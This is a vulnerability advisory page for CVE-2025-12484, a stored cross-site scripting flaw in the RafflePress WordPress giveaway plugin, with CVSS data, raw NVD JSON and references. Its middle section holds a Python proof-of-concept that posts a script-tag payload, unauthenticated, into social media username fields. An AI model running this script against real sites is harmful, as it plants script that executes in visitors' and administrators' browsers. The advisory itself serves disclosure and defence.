Security Vulnerability Report
CVE-2025-12484 CVSS 7.2 HIGH

CVE-2025-12484

Published: 2025-11-19 08:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

RafflePress plugin <= 1.12.19 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-12484 PoC - RafflePress Stored XSS
# Target: WordPress site with RafflePress plugin <= 1.12.19

TARGET_URL = "http://target-wordpress-site.com"

# XSS payload for social media username fields
xss_payload = '<script>alert("XSS")</script>'


def exploit_stored_xss():
    """
    This PoC demonstrates the stored XSS vulnerability in RafflePress plugin.
    The vulnerability exists in social media username parameters that are
    not properly sanitized before being stored and displayed.

    Affected endpoints:
    - app/entry.php (form submission)
    - app/rafflepress.php (display logic, lines 539, 543, 547, 551)

    Attack vector: POST request with malicious username parameters
    """
    # Target WordPress REST API endpoint for RafflePress
    endpoint = f"{TARGET_URL}/wp-json/rafflepress/v1/entry"

    # Malicious data with XSS payload in social media username fields
    data = {
        'giveaway_id': 1,
        'facebook_username': xss_payload,
        'twitter_username': xss_payload,
        'instagram_username': xss_payload,
        'youtube_username': xss_payload
    }

    headers = {
        'Content-Type': 'application/json',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
    }

    try:
        print(f"[*] Sending XSS payload to {TARGET_URL}")
        print(f"[*] Payload: {xss_payload}")

        # Send POST request (unauthenticated)
        response = requests.post(endpoint, json=data, headers=headers, timeout=10)

        if response.status_code in [200, 201]:
            print("[+] XSS payload stored successfully!")
            print("[*] When admin or users view the giveaway page, the XSS will execute.")
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-12484 - RafflePress Stored XSS PoC")
    print("=" * 60)
    exploit_stored_xss()
```

References

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12484",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-19T08:15:51.367",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple social media username parameters in all versions up to, and including, 1.12.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-79" }
        ]
      }
    ],
    "references": [
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/entry.php#L110", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L539", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L543", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L547", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L551", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L555", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L559", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/rafflepress/tags/1.12.19/app/rafflepress.php#L563", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3398188%40rafflepress&old=3346436%40rafflepress&sfp_email=&sfph_mail=", "source": "[email protected]" },
      { "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7cda6aad-36e1-45c7-af46-a7b90bb2d339?source=cve", "source": "[email protected]" }
    ]
  }
}
```